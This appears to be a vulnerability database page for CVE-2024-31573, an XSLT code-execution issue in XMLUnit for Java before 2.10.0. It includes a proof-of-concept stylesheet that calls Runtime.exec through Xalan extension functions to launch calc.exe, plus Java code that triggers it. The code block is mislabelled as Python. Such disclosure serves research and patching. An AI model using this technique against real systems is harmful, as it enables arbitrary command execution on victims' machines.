Security Vulnerability Report
中文
CVE-2024-31573 CVSS 4.0 MEDIUM

CVE-2024-31573

Published: 2025-10-17 19:15:37
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

XMLUnit for Java before 2.10.0, in the default configuration, might allow code execution via an untrusted stylesheet (used for an XSLT transformation), because XSLT extension functions are enabled.

CVSS Details

CVSS Score
4.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

XMLUnit for Java < 2.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?xml version="1.0" encoding="UTF-8"?> <!-- * PoC for CVE-2024-31573 * XMLUnit for Java XSLT Extension Function Code Execution * This malicious XSLT stylesheet exploits enabled XSLT extension functions * to execute arbitrary commands via Java Runtime.exec() --> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:str="http://xml.apache.org/xalan/java/java.lang.String" exclude-result-prefixes="rt str"> <xsl:template match="/"> <xsl:variable name="runtime" select="rt:getRuntime()"/> <xsl:variable name="command"> <str:new>calc.exe</str:new> </xsl:variable> <xsl:variable name="process" select="rt:exec($runtime, $command)"/> <result> <status>Code execution attempted</status> <command><xsl:value-of select="$command"/></command> </result> </xsl:template> </xsl:stylesheet> // Java code to trigger the vulnerability using XMLUnit: /* import org.xmlunit.transform.Transformation; import org.xmlunit.transform.Transform; import javax.xml.transform.Source; import javax.xml.transform.stream.StreamSource; import java.io.StringReader; public class XsltExploit { public static void main(String[] args) throws Exception { String maliciousXslt = "<!-- above XSLT content -->"; Source xsltSource = new StreamSource(new StringReader(maliciousXslt)); Source xmlSource = new StreamSource(new StringReader("<root/>")); // XMLUnit before 2.10.0 - extension functions enabled by default Transformation transformation = new Transformation(xmlSource, xsltSource); // This will trigger code execution transformation.transform(); } } */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-31573", "sourceIdentifier": "[email protected]", "published": "2025-10-17T19:15:36.627", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "XMLUnit for Java before 2.10.0, in the default configuration, might allow code execution via an untrusted stylesheet (used for an XSLT transformation), because XSLT extension functions are enabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.4, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-669"}]}], "references": [{"url": "https://github.com/advisories/GHSA-chfm-68vv-pvw5", "source": "[email protected]"}, {"url": "https://github.com/xmlunit/xmlunit/commit/b81d48b71dfd2868bdfc30a3e17ff973f32bc15b", "source": "[email protected]"}, {"url": "https://github.com/xmlunit/xmlunit/issues/264", "source": "[email protected]"}, {"url": "https://github.com/xmlunit/xmlunit/issues/264", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.